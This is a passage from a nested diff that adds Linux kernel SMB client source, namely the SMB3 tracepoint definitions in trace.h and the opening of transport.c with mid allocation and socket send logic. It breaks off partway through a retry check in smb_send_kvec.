++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(hardlink_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(rename_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(rmdir_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(set_eof_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(set_info_compound_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(delete_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(mkdir_done);
++DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(tdis_done);
++
++
++DECLARE_EVENT_CLASS(smb3_inf_compound_err_class,
++	TP_PROTO(unsigned int xid,
++		__u32	tid,
++		__u64	sesid,
++		int	rc),
++	TP_ARGS(xid, tid, sesid, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->rc = rc;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x rc=%d",
++		__entry->xid, __entry->sesid, __entry->tid,
++		__entry->rc)
++)
++
++#define DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(name)     \
++DEFINE_EVENT(smb3_inf_compound_err_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		int rc),			\
++	TP_ARGS(xid, tid, sesid, rc))
++
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(query_info_compound_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(posix_query_info_compound_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(hardlink_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(rename_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(rmdir_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(set_eof_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(set_info_compound_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(mkdir_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(delete_err);
++DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(tdis_err);
++
++/*
++ * For logging SMB3 Status code and Command for responses which return errors
++ */
++DECLARE_EVENT_CLASS(smb3_cmd_err_class,
++	TP_PROTO(__u32	tid,
++		__u64	sesid,
++		__u16	cmd,
++		__u64	mid,
++		__u32	status,
++		int	rc),
++	TP_ARGS(tid, sesid, cmd, mid, status, rc),
++	TP_STRUCT__entry(
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u16, cmd)
++		__field(__u64, mid)
++		__field(__u32, status)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->cmd = cmd;
++		__entry->mid = mid;
++		__entry->status = status;
++		__entry->rc = rc;
++	),
++	TP_printk("\tsid=0x%llx tid=0x%x cmd=%u mid=%llu status=0x%x rc=%d",
++		__entry->sesid, __entry->tid, __entry->cmd, __entry->mid,
++		__entry->status, __entry->rc)
++)
++
++#define DEFINE_SMB3_CMD_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_cmd_err_class, smb3_##name,    \
++	TP_PROTO(__u32	tid,			\
++		__u64	sesid,			\
++		__u16	cmd,			\
++		__u64	mid,			\
++		__u32	status,			\
++		int	rc),			\
++	TP_ARGS(tid, sesid, cmd, mid, status, rc))
++
++DEFINE_SMB3_CMD_ERR_EVENT(cmd_err);
++
++DECLARE_EVENT_CLASS(smb3_cmd_done_class,
++	TP_PROTO(__u32	tid,
++		__u64	sesid,
++		__u16	cmd,
++		__u64	mid),
++	TP_ARGS(tid, sesid, cmd, mid),
++	TP_STRUCT__entry(
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u16, cmd)
++		__field(__u64, mid)
++	),
++	TP_fast_assign(
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->cmd = cmd;
++		__entry->mid = mid;
++	),
++	TP_printk("\tsid=0x%llx tid=0x%x cmd=%u mid=%llu",
++		__entry->sesid, __entry->tid,
++		__entry->cmd, __entry->mid)
++)
++
++#define DEFINE_SMB3_CMD_DONE_EVENT(name)          \
++DEFINE_EVENT(smb3_cmd_done_class, smb3_##name,    \
++	TP_PROTO(__u32	tid,			\
++		__u64	sesid,			\
++		__u16	cmd,			\
++		__u64	mid),			\
++	TP_ARGS(tid, sesid, cmd, mid))
++
++DEFINE_SMB3_CMD_DONE_EVENT(cmd_enter);
++DEFINE_SMB3_CMD_DONE_EVENT(cmd_done);
++DEFINE_SMB3_CMD_DONE_EVENT(ses_expired);
++
++DECLARE_EVENT_CLASS(smb3_mid_class,
++	TP_PROTO(__u16	cmd,
++		__u64	mid,
++		__u32	pid,
++		unsigned long when_sent,
++		unsigned long when_received),
++	TP_ARGS(cmd, mid, pid, when_sent, when_received),
++	TP_STRUCT__entry(
++		__field(__u16, cmd)
++		__field(__u64, mid)
++		__field(__u32, pid)
++		__field(unsigned long, when_sent)
++		__field(unsigned long, when_received)
++	),
++	TP_fast_assign(
++		__entry->cmd = cmd;
++		__entry->mid = mid;
++		__entry->pid = pid;
++		__entry->when_sent = when_sent;
++		__entry->when_received = when_received;
++	),
++	TP_printk("\tcmd=%u mid=%llu pid=%u, when_sent=%lu when_rcv=%lu",
++		__entry->cmd, __entry->mid, __entry->pid, __entry->when_sent,
++		__entry->when_received)
++)
++
++#define DEFINE_SMB3_MID_EVENT(name)          \
++DEFINE_EVENT(smb3_mid_class, smb3_##name,    \
++	TP_PROTO(__u16	cmd,			\
++		__u64	mid,			\
++		__u32	pid,			\
++		unsigned long when_sent,	\
++		unsigned long when_received),	\
++	TP_ARGS(cmd, mid, pid, when_sent, when_received))
++
++DEFINE_SMB3_MID_EVENT(slow_rsp);
++
++DECLARE_EVENT_CLASS(smb3_exit_err_class,
++	TP_PROTO(unsigned int xid,
++		const char *func_name,
++		int	rc),
++	TP_ARGS(xid, func_name, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__string(func_name, func_name)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__assign_str(func_name, func_name);
++		__entry->rc = rc;
++	),
++	TP_printk("\t%s: xid=%u rc=%d",
++		__get_str(func_name), __entry->xid, __entry->rc)
++)
++
++#define DEFINE_SMB3_EXIT_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_exit_err_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		const char *func_name,		\
++		int	rc),			\
++	TP_ARGS(xid, func_name, rc))
++
++DEFINE_SMB3_EXIT_ERR_EVENT(exit_err);
++
++
++DECLARE_EVENT_CLASS(smb3_sync_err_class,
++	TP_PROTO(unsigned long ino,
++		int	rc),
++	TP_ARGS(ino, rc),
++	TP_STRUCT__entry(
++		__field(unsigned long, ino)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->ino = ino;
++		__entry->rc = rc;
++	),
++	TP_printk("\tino=%lu rc=%d",
++		__entry->ino, __entry->rc)
++)
++
++#define DEFINE_SMB3_SYNC_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_sync_err_class, cifs_##name,    \
++	TP_PROTO(unsigned long ino,		\
++		int	rc),			\
++	TP_ARGS(ino, rc))
++
++DEFINE_SMB3_SYNC_ERR_EVENT(fsync_err);
++DEFINE_SMB3_SYNC_ERR_EVENT(flush_err);
++
++
++DECLARE_EVENT_CLASS(smb3_enter_exit_class,
++	TP_PROTO(unsigned int xid,
++		const char *func_name),
++	TP_ARGS(xid, func_name),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__string(func_name, func_name)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__assign_str(func_name, func_name);
++	),
++	TP_printk("\t%s: xid=%u",
++		__get_str(func_name), __entry->xid)
++)
++
++#define DEFINE_SMB3_ENTER_EXIT_EVENT(name)        \
++DEFINE_EVENT(smb3_enter_exit_class, smb3_##name,  \
++	TP_PROTO(unsigned int xid,		\
++		const char *func_name),		\
++	TP_ARGS(xid, func_name))
++
++DEFINE_SMB3_ENTER_EXIT_EVENT(enter);
++DEFINE_SMB3_ENTER_EXIT_EVENT(exit_done);
++
++/*
++ * For SMB2/SMB3 tree connect
++ */
++
++DECLARE_EVENT_CLASS(smb3_tcon_class,
++	TP_PROTO(unsigned int xid,
++		__u32	tid,
++		__u64	sesid,
++		const char *unc_name,
++		int	rc),
++	TP_ARGS(xid, tid, sesid, unc_name, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__string(name, unc_name)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__assign_str(name, unc_name);
++		__entry->rc = rc;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x unc_name=%s rc=%d",
++		__entry->xid, __entry->sesid, __entry->tid,
++		__get_str(name), __entry->rc)
++)
++
++#define DEFINE_SMB3_TCON_EVENT(name)          \
++DEFINE_EVENT(smb3_tcon_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		const char *unc_name,		\
++		int	rc),			\
++	TP_ARGS(xid, tid, sesid, unc_name, rc))
++
++DEFINE_SMB3_TCON_EVENT(tcon);
++
++
++/*
++ * For smb2/smb3 open (including create and mkdir) calls
++ */
++
++DECLARE_EVENT_CLASS(smb3_open_enter_class,
++	TP_PROTO(unsigned int xid,
++		__u32	tid,
++		__u64	sesid,
++		const char *full_path,
++		int	create_options,
++		int	desired_access),
++	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__string(path, full_path)
++		__field(int, create_options)
++		__field(int, desired_access)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__assign_str(path, full_path);
++		__entry->create_options = create_options;
++		__entry->desired_access = desired_access;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x path=%s cr_opts=0x%x des_access=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid, __get_str(path),
++		__entry->create_options, __entry->desired_access)
++)
++
++#define DEFINE_SMB3_OPEN_ENTER_EVENT(name)        \
++DEFINE_EVENT(smb3_open_enter_class, smb3_##name,  \
++	TP_PROTO(unsigned int xid,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		const char *full_path,		\
++		int	create_options,		\
++		int	desired_access),	\
++	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access))
++
++DEFINE_SMB3_OPEN_ENTER_EVENT(open_enter);
++DEFINE_SMB3_OPEN_ENTER_EVENT(posix_mkdir_enter);
++
++DECLARE_EVENT_CLASS(smb3_open_err_class,
++	TP_PROTO(unsigned int xid,
++		__u32	tid,
++		__u64	sesid,
++		int	create_options,
++		int	desired_access,
++		int	rc),
++	TP_ARGS(xid, tid, sesid, create_options, desired_access, rc),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(int,   create_options)
++		__field(int, desired_access)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->create_options = create_options;
++		__entry->desired_access = desired_access;
++		__entry->rc = rc;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x cr_opts=0x%x des_access=0x%x rc=%d",
++		__entry->xid, __entry->sesid, __entry->tid,
++		__entry->create_options, __entry->desired_access, __entry->rc)
++)
++
++#define DEFINE_SMB3_OPEN_ERR_EVENT(name)          \
++DEFINE_EVENT(smb3_open_err_class, smb3_##name,    \
++	TP_PROTO(unsigned int xid,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		int	create_options,		\
++		int	desired_access,		\
++		int	rc),			\
++	TP_ARGS(xid, tid, sesid, create_options, desired_access, rc))
++
++DEFINE_SMB3_OPEN_ERR_EVENT(open_err);
++DEFINE_SMB3_OPEN_ERR_EVENT(posix_mkdir_err);
++
++DECLARE_EVENT_CLASS(smb3_open_done_class,
++	TP_PROTO(unsigned int xid,
++		__u64	fid,
++		__u32	tid,
++		__u64	sesid,
++		int	create_options,
++		int	desired_access),
++	TP_ARGS(xid, fid, tid, sesid, create_options, desired_access),
++	TP_STRUCT__entry(
++		__field(unsigned int, xid)
++		__field(__u64, fid)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(int, create_options)
++		__field(int, desired_access)
++	),
++	TP_fast_assign(
++		__entry->xid = xid;
++		__entry->fid = fid;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->create_options = create_options;
++		__entry->desired_access = desired_access;
++	),
++	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx cr_opts=0x%x des_access=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
++		__entry->create_options, __entry->desired_access)
++)
++
++#define DEFINE_SMB3_OPEN_DONE_EVENT(name)        \
++DEFINE_EVENT(smb3_open_done_class, smb3_##name,  \
++	TP_PROTO(unsigned int xid,		\
++		__u64	fid,			\
++		__u32	tid,			\
++		__u64	sesid,			\
++		int	create_options,		\
++		int	desired_access),	\
++	TP_ARGS(xid, fid, tid, sesid, create_options, desired_access))
++
++DEFINE_SMB3_OPEN_DONE_EVENT(open_done);
++DEFINE_SMB3_OPEN_DONE_EVENT(posix_mkdir_done);
++
++
++DECLARE_EVENT_CLASS(smb3_lease_done_class,
++	TP_PROTO(__u32	lease_state,
++		__u32	tid,
++		__u64	sesid,
++		__u64	lease_key_low,
++		__u64	lease_key_high),
++	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high),
++	TP_STRUCT__entry(
++		__field(__u32, lease_state)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u64, lease_key_low)
++		__field(__u64, lease_key_high)
++	),
++	TP_fast_assign(
++		__entry->lease_state = lease_state;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->lease_key_low = lease_key_low;
++		__entry->lease_key_high = lease_key_high;
++	),
++	TP_printk("sid=0x%llx tid=0x%x lease_key=0x%llx%llx lease_state=0x%x",
++		__entry->sesid, __entry->tid, __entry->lease_key_high,
++		__entry->lease_key_low, __entry->lease_state)
++)
++
++#define DEFINE_SMB3_LEASE_DONE_EVENT(name)        \
++DEFINE_EVENT(smb3_lease_done_class, smb3_##name,  \
++	TP_PROTO(__u32	lease_state,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u64	lease_key_low,		\
++		__u64	lease_key_high),	\
++	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high))
++
++DEFINE_SMB3_LEASE_DONE_EVENT(lease_done);
++DEFINE_SMB3_LEASE_DONE_EVENT(lease_not_found);
++
++DECLARE_EVENT_CLASS(smb3_lease_err_class,
++	TP_PROTO(__u32	lease_state,
++		__u32	tid,
++		__u64	sesid,
++		__u64	lease_key_low,
++		__u64	lease_key_high,
++		int	rc),
++	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high, rc),
++	TP_STRUCT__entry(
++		__field(__u32, lease_state)
++		__field(__u32, tid)
++		__field(__u64, sesid)
++		__field(__u64, lease_key_low)
++		__field(__u64, lease_key_high)
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		__entry->lease_state = lease_state;
++		__entry->tid = tid;
++		__entry->sesid = sesid;
++		__entry->lease_key_low = lease_key_low;
++		__entry->lease_key_high = lease_key_high;
++		__entry->rc = rc;
++	),
++	TP_printk("sid=0x%llx tid=0x%x lease_key=0x%llx%llx lease_state=0x%x rc=%d",
++		__entry->sesid, __entry->tid, __entry->lease_key_high,
++		__entry->lease_key_low, __entry->lease_state, __entry->rc)
++)
++
++#define DEFINE_SMB3_LEASE_ERR_EVENT(name)        \
++DEFINE_EVENT(smb3_lease_err_class, smb3_##name,  \
++	TP_PROTO(__u32	lease_state,		\
++		__u32	tid,			\
++		__u64	sesid,			\
++		__u64	lease_key_low,		\
++		__u64	lease_key_high,		\
++		int	rc),			\
++	TP_ARGS(lease_state, tid, sesid, lease_key_low, lease_key_high, rc))
++
++DEFINE_SMB3_LEASE_ERR_EVENT(lease_err);
++
++DECLARE_EVENT_CLASS(smb3_connect_class,
++	TP_PROTO(char *hostname,
++		__u64 conn_id,
++		const struct __kernel_sockaddr_storage *dst_addr),
++	TP_ARGS(hostname, conn_id, dst_addr),
++	TP_STRUCT__entry(
++		__string(hostname, hostname)
++		__field(__u64, conn_id)
++		__array(__u8, dst_addr, sizeof(struct sockaddr_storage))
++	),
++	TP_fast_assign(
++		struct sockaddr_storage *pss = NULL;
++
++		__entry->conn_id = conn_id;
++		pss = (struct sockaddr_storage *)__entry->dst_addr;
++		*pss = *dst_addr;
++		__assign_str(hostname, hostname);
++	),
++	TP_printk("conn_id=0x%llx server=%s addr=%pISpsfc",
++		__entry->conn_id,
++		__get_str(hostname),
++		__entry->dst_addr)
++)
++
++#define DEFINE_SMB3_CONNECT_EVENT(name)        \
++DEFINE_EVENT(smb3_connect_class, smb3_##name,  \
++	TP_PROTO(char *hostname,		\
++		__u64 conn_id,			\
++		const struct __kernel_sockaddr_storage *addr),	\
++	TP_ARGS(hostname, conn_id, addr))
++
++DEFINE_SMB3_CONNECT_EVENT(connect_done);
++
++DECLARE_EVENT_CLASS(smb3_connect_err_class,
++	TP_PROTO(char *hostname, __u64 conn_id,
++		const struct __kernel_sockaddr_storage *dst_addr, int rc),
++	TP_ARGS(hostname, conn_id, dst_addr, rc),
++	TP_STRUCT__entry(
++		__string(hostname, hostname)
++		__field(__u64, conn_id)
++		__array(__u8, dst_addr, sizeof(struct sockaddr_storage))
++		__field(int, rc)
++	),
++	TP_fast_assign(
++		struct sockaddr_storage *pss = NULL;
++
++		__entry->conn_id = conn_id;
++		__entry->rc = rc;
++		pss = (struct sockaddr_storage *)__entry->dst_addr;
++		*pss = *dst_addr;
++		__assign_str(hostname, hostname);
++	),
++	TP_printk("rc=%d conn_id=0x%llx server=%s addr=%pISpsfc",
++		__entry->rc,
++		__entry->conn_id,
++		__get_str(hostname),
++		__entry->dst_addr)
++)
++
++#define DEFINE_SMB3_CONNECT_ERR_EVENT(name)        \
++DEFINE_EVENT(smb3_connect_err_class, smb3_##name,  \
++	TP_PROTO(char *hostname,		\
++		__u64 conn_id,			\
++		const struct __kernel_sockaddr_storage *addr,	\
++		int rc),			\
++	TP_ARGS(hostname, conn_id, addr, rc))
++
++DEFINE_SMB3_CONNECT_ERR_EVENT(connect_err);
++
++DECLARE_EVENT_CLASS(smb3_reconnect_class,
++	TP_PROTO(__u64	currmid,
++		__u64 conn_id,
++		char *hostname),
++	TP_ARGS(currmid, conn_id, hostname),
++	TP_STRUCT__entry(
++		__field(__u64, currmid)
++		__field(__u64, conn_id)
++		__string(hostname, hostname)
++	),
++	TP_fast_assign(
++		__entry->currmid = currmid;
++		__entry->conn_id = conn_id;
++		__assign_str(hostname, hostname);
++	),
++	TP_printk("conn_id=0x%llx server=%s current_mid=%llu",
++		__entry->conn_id,
++		__get_str(hostname),
++		__entry->currmid)
++)
++
++#define DEFINE_SMB3_RECONNECT_EVENT(name)        \
++DEFINE_EVENT(smb3_reconnect_class, smb3_##name,  \
++	TP_PROTO(__u64	currmid,		\
++		__u64 conn_id,			\
++		char *hostname),				\
++	TP_ARGS(currmid, conn_id, hostname))
++
++DEFINE_SMB3_RECONNECT_EVENT(reconnect);
++DEFINE_SMB3_RECONNECT_EVENT(partial_send_reconnect);
++
++DECLARE_EVENT_CLASS(smb3_credit_class,
++	TP_PROTO(__u64	currmid,
++		__u64 conn_id,
++		char *hostname,
++		int credits,
++		int credits_to_add,
++		int in_flight),
++	TP_ARGS(currmid, conn_id, hostname, credits, credits_to_add, in_flight),
++	TP_STRUCT__entry(
++		__field(__u64, currmid)
++		__field(__u64, conn_id)
++		__string(hostname, hostname)
++		__field(int, credits)
++		__field(int, credits_to_add)
++		__field(int, in_flight)
++	),
++	TP_fast_assign(
++		__entry->currmid = currmid;
++		__entry->conn_id = conn_id;
++		__assign_str(hostname, hostname);
++		__entry->credits = credits;
++		__entry->credits_to_add = credits_to_add;
++		__entry->in_flight = in_flight;
++	),
++	TP_printk("conn_id=0x%llx server=%s current_mid=%llu "
++			"credits=%d credit_change=%d in_flight=%d",
++		__entry->conn_id,
++		__get_str(hostname),
++		__entry->currmid,
++		__entry->credits,
++		__entry->credits_to_add,
++		__entry->in_flight)
++)
++
++#define DEFINE_SMB3_CREDIT_EVENT(name)        \
++DEFINE_EVENT(smb3_credit_class, smb3_##name,  \
++	TP_PROTO(__u64	currmid,		\
++		__u64 conn_id,			\
++		char *hostname,			\
++		int  credits,			\
++		int  credits_to_add,	\
++		int in_flight),			\
++	TP_ARGS(currmid, conn_id, hostname, credits, credits_to_add, in_flight))
++
++DEFINE_SMB3_CREDIT_EVENT(reconnect_with_invalid_credits);
++DEFINE_SMB3_CREDIT_EVENT(reconnect_detected);
++DEFINE_SMB3_CREDIT_EVENT(credit_timeout);
++DEFINE_SMB3_CREDIT_EVENT(insufficient_credits);
++DEFINE_SMB3_CREDIT_EVENT(too_many_credits);
++DEFINE_SMB3_CREDIT_EVENT(add_credits);
++DEFINE_SMB3_CREDIT_EVENT(adj_credits);
++DEFINE_SMB3_CREDIT_EVENT(hdr_credits);
++DEFINE_SMB3_CREDIT_EVENT(nblk_credits);
++DEFINE_SMB3_CREDIT_EVENT(pend_credits);
++DEFINE_SMB3_CREDIT_EVENT(wait_credits);
++DEFINE_SMB3_CREDIT_EVENT(waitff_credits);
++DEFINE_SMB3_CREDIT_EVENT(overflow_credits);
++DEFINE_SMB3_CREDIT_EVENT(set_credits);
++
++#endif /* _CIFS_TRACE_H */
++
++#undef TRACE_INCLUDE_PATH
++#define TRACE_INCLUDE_PATH .
++#define TRACE_INCLUDE_FILE trace
++#include <trace/define_trace.h>
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+new file mode 100644
+index 0000000000000..c961b90f92b9f
+--- /dev/null
++++ b/fs/smb/client/transport.c
+@@ -0,0 +1,1807 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *   Jeremy Allison (jra@samba.org) 2006.
++ *
++ */
++
++#include <linux/fs.h>
++#include <linux/list.h>
++#include <linux/gfp.h>
++#include <linux/wait.h>
++#include <linux/net.h>
++#include <linux/delay.h>
++#include <linux/freezer.h>
++#include <linux/tcp.h>
++#include <linux/bvec.h>
++#include <linux/highmem.h>
++#include <linux/uaccess.h>
++#include <asm/processor.h>
++#include <linux/mempool.h>
++#include <linux/sched/signal.h>
++#include <linux/task_io_accounting_ops.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "smb2proto.h"
++#include "smbdirect.h"
++
++/* Max number of iovectors we can use off the stack when sending requests. */
++#define CIFS_MAX_IOV_SIZE 8
++
++void
++cifs_wake_up_task(struct mid_q_entry *mid)
++{
++	wake_up_process(mid->callback_data);
++}
++
++static struct mid_q_entry *
++alloc_mid(const struct smb_hdr *smb_buffer, struct TCP_Server_Info *server)
++{
++	struct mid_q_entry *temp;
++
++	if (server == NULL) {
++		cifs_dbg(VFS, "%s: null TCP session\n", __func__);
++		return NULL;
++	}
++
++	temp = mempool_alloc(cifs_mid_poolp, GFP_NOFS);
++	memset(temp, 0, sizeof(struct mid_q_entry));
++	kref_init(&temp->refcount);
++	temp->mid = get_mid(smb_buffer);
++	temp->pid = current->pid;
++	temp->command = cpu_to_le16(smb_buffer->Command);
++	cifs_dbg(FYI, "For smb_command %d\n", smb_buffer->Command);
++	/*	do_gettimeofday(&temp->when_sent);*/ /* easier to use jiffies */
++	/* when mid allocated can be before when sent */
++	temp->when_alloc = jiffies;
++	temp->server = server;
++
++	/*
++	 * The default is for the mid to be synchronous, so the
++	 * default callback just wakes up the current task.
++	 */
++	get_task_struct(current);
++	temp->creator = current;
++	temp->callback = cifs_wake_up_task;
++	temp->callback_data = current;
++
++	atomic_inc(&mid_count);
++	temp->mid_state = MID_REQUEST_ALLOCATED;
++	return temp;
++}
++
++static void __release_mid(struct kref *refcount)
++{
++	struct mid_q_entry *midEntry =
++			container_of(refcount, struct mid_q_entry, refcount);
++#ifdef CONFIG_CIFS_STATS2
++	__le16 command = midEntry->server->vals->lock_cmd;
++	__u16 smb_cmd = le16_to_cpu(midEntry->command);
++	unsigned long now;
++	unsigned long roundtrip_time;
++#endif
++	struct TCP_Server_Info *server = midEntry->server;
++
++	if (midEntry->resp_buf && (midEntry->mid_flags & MID_WAIT_CANCELLED) &&
++	    midEntry->mid_state == MID_RESPONSE_RECEIVED &&
++	    server->ops->handle_cancelled_mid)
++		server->ops->handle_cancelled_mid(midEntry, server);
++
++	midEntry->mid_state = MID_FREE;
++	atomic_dec(&mid_count);
++	if (midEntry->large_buf)
++		cifs_buf_release(midEntry->resp_buf);
++	else
++		cifs_small_buf_release(midEntry->resp_buf);
++#ifdef CONFIG_CIFS_STATS2
++	now = jiffies;
++	if (now < midEntry->when_alloc)
++		cifs_server_dbg(VFS, "Invalid mid allocation time\n");
++	roundtrip_time = now - midEntry->when_alloc;
++
++	if (smb_cmd < NUMBER_OF_SMB2_COMMANDS) {
++		if (atomic_read(&server->num_cmds[smb_cmd]) == 0) {
++			server->slowest_cmd[smb_cmd] = roundtrip_time;
++			server->fastest_cmd[smb_cmd] = roundtrip_time;
++		} else {
++			if (server->slowest_cmd[smb_cmd] < roundtrip_time)
++				server->slowest_cmd[smb_cmd] = roundtrip_time;
++			else if (server->fastest_cmd[smb_cmd] > roundtrip_time)
++				server->fastest_cmd[smb_cmd] = roundtrip_time;
++		}
++		cifs_stats_inc(&server->num_cmds[smb_cmd]);
++		server->time_per_cmd[smb_cmd] += roundtrip_time;
++	}
++	/*
++	 * commands taking longer than one second (default) can be indications
++	 * that something is wrong, unless it is quite a slow link or a very
++	 * busy server. Note that this calc is unlikely or impossible to wrap
++	 * as long as slow_rsp_threshold is not set way above recommended max
++	 * value (32767 ie 9 hours) and is generally harmless even if wrong
++	 * since only affects debug counters - so leaving the calc as simple
++	 * comparison rather than doing multiple conversions and overflow
++	 * checks
++	 */
++	if ((slow_rsp_threshold != 0) &&
++	    time_after(now, midEntry->when_alloc + (slow_rsp_threshold * HZ)) &&
++	    (midEntry->command != command)) {
++		/*
++		 * smb2slowcmd[NUMBER_OF_SMB2_COMMANDS] counts by command
++		 * NB: le16_to_cpu returns unsigned so can not be negative below
++		 */
++		if (smb_cmd < NUMBER_OF_SMB2_COMMANDS)
++			cifs_stats_inc(&server->smb2slowcmd[smb_cmd]);
++
++		trace_smb3_slow_rsp(smb_cmd, midEntry->mid, midEntry->pid,
++			       midEntry->when_sent, midEntry->when_received);
++		if (cifsFYI & CIFS_TIMER) {
++			pr_debug("slow rsp: cmd %d mid %llu",
++				 midEntry->command, midEntry->mid);
++			cifs_info("A: 0x%lx S: 0x%lx R: 0x%lx\n",
++				  now - midEntry->when_alloc,
++				  now - midEntry->when_sent,
++				  now - midEntry->when_received);
++		}
++	}
++#endif
++	put_task_struct(midEntry->creator);
++
++	mempool_free(midEntry, cifs_mid_poolp);
++}
++
++void release_mid(struct mid_q_entry *mid)
++{
++	struct TCP_Server_Info *server = mid->server;
++
++	spin_lock(&server->mid_lock);
++	kref_put(&mid->refcount, __release_mid);
++	spin_unlock(&server->mid_lock);
++}
++
++void
++delete_mid(struct mid_q_entry *mid)
++{
++	spin_lock(&mid->server->mid_lock);
++	if (!(mid->mid_flags & MID_DELETED)) {
++		list_del_init(&mid->qhead);
++		mid->mid_flags |= MID_DELETED;
++	}
++	spin_unlock(&mid->server->mid_lock);
++
++	release_mid(mid);
++}
++
++/*
++ * smb_send_kvec - send an array of kvecs to the server
++ * @server:	Server to send the data to
++ * @smb_msg:	Message to send
++ * @sent:	amount of data sent on socket is stored here
++ *
++ * Our basic "send data to server" function. Should be called with srv_mutex
++ * held. The caller is responsible for handling the results.
++ */
++static int
++smb_send_kvec(struct TCP_Server_Info *server, struct msghdr *smb_msg,
++	      size_t *sent)
++{
++	int rc = 0;
++	int retries = 0;
++	struct socket *ssocket = server->ssocket;
++
++	*sent = 0;
++
++	if (server->noblocksnd)
++		smb_msg->msg_flags = MSG_DONTWAIT + MSG_NOSIGNAL;
++	else
++		smb_msg->msg_flags = MSG_NOSIGNAL;
++
++	while (msg_data_left(smb_msg)) {
++		/*
++		 * If blocking send, we try 3 times, since each can block
++		 * for 5 seconds. For nonblocking  we have to try more
++		 * but wait increasing amounts of time allowing time for
++		 * socket to clear.  The overall time we wait in either
++		 * case to send on the socket is about 15 seconds.
++		 * Similarly we wait for 15 seconds for a response from
++		 * the server in SendReceive[2] for the server to send
++		 * a response back for most types of requests (except
++		 * SMB Write past end of file which can be slow, and
++		 * blocking lock operations). NFS waits slightly longer
++		 * than CIFS, but this can make it take longer for
++		 * nonresponsive servers to be detected and 15 seconds
++		 * is more than enough time for modern networks to
++		 * send a packet.  In most cases if we fail to send
++		 * after the retries we will kill the socket and
++		 * reconnect which may clear the network problem.
++		 */
++		rc = sock_sendmsg(ssocket, smb_msg);
++		if (rc == -EAGAIN) {
++			retries++;
++			if (retries >= 14 ||
